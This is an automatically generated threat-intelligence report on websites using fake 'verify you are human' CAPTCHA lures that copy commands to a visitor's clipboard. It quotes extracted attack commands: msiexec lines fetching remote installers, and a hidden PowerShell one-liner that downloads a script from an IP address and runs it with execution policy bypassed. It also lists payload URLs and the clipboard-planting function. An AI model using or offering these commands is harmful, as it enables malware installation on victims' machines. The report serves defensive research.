ClickGrab Threat Analysis Report - 2025-12-04
Generated on 2025-12-04 02:32:31
Executive Summary
- Total sites analyzed: 50
- Sites with malicious content: 36
- Unique domains encountered: 29
- Total URLs extracted: 291
- PowerShell download attempts: 2
- Clipboard manipulation instances: 208
Domain Analysis
Most Frequently Encountered Domains
- www.appirockyinn.com: 40 occurrences
- www.google.com: 38 occurrences
- i.postimg.cc: 34 occurrences
- icons.duckduckgo.com: 33 occurrences
- ${host}: 33 occurrences
- shift-art.com: 21 occurrences
- globeerp.com: 14 occurrences
- pizzabyte.com.au: 11 occurrences
- www.webgo.de: 10 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- api.whatsapp.com: 6 occurrences
- www.facebook.com: 5 occurrences
- mc.yandex.ru: 4 occurrences
- t.me: 3 occurrences
URL Pattern Analysis
reCAPTCHA imagery
15 occurrences across 4 distinct URLs
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(11 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(1 times)https://www.google.com/recaptcha/api.js?render=6LdhyYMdAAAAAHRbZsMlOTYOsaGsIiPmAp0nPxB8&ver=3.0(1 times)
Font resources
1 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(1 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
41 occurrences across 8 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(33 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(1 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)- ...and 3 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 635 (33 unique)
Keyword Categories
Social Engineering
18 unique keywords
CAPTCHA Verificationverification-idI am not a robotTo better prove you are not a robotverification_idcommand = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";Verification IDverification idrobotverification- ...and 8 more
System Commands
8 unique keywords
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)command = "msiexec /i https://suzume-design.com/cioudfiare";cmdcmd /c start powersheii -w hidden -ep Bypass -f $a";`const command =command =powersheii -w hidden -nop -c "$k='qg8.psi';$x=Join-Path $env:ProgramData 'ea';$a=Join-Path $x $k;md $x -ea 0|out-nuii;iwr 'http://i85.i63.204.237/2eue.json' -OutFiie $a;cmd /c start powersheii -w hidden -ep Bypass -f $a";exec /i https://suzume-design.com/cioudfiare";exec(
Verification Text
3 unique keywords
Hiddenray idhidden
Technical Terms
4 unique keywords
iexfailed_to_retrieveRay IDBypass
Most Frequent Keywords
- hidden: 38 occurrences
- robot: 37 occurrences
- CAPTCHA Verification: 35 occurrences
- I am not a robot: 35 occurrences
- Robot: 35 occurrences
- Verification: 35 occurrences
- verification: 35 occurrences
- verification-id: 35 occurrences
- To better prove you are not a robot: 35 occurrences
- Verification ID: 34 occurrences
- Ray ID: 34 occurrences
- Checking if you are human: 34 occurrences
- Verify you are human: 34 occurrences
- const command =: 34 occurrences
- verification id: 33 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";, exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
/bitrix/tools/captcha09defff83c8d549c62aa2a1615720411com/recaptcha/about/images/reCAPTCHAcom/i23/cioudfiare/verify/humanverfification/cioud...au/smartdetection/deviceverification/CF/path/captc...
Clipboard Manipulation Analysis
Detected clipboard manipulation in 208 instances.
Document.Execcommand Copy
Found in 105 snippets (50.5% of clipboard code)
Examples:
document.execCommand('copy')
try { document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 105 snippets (50.5% of clipboard code)
Examples:
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.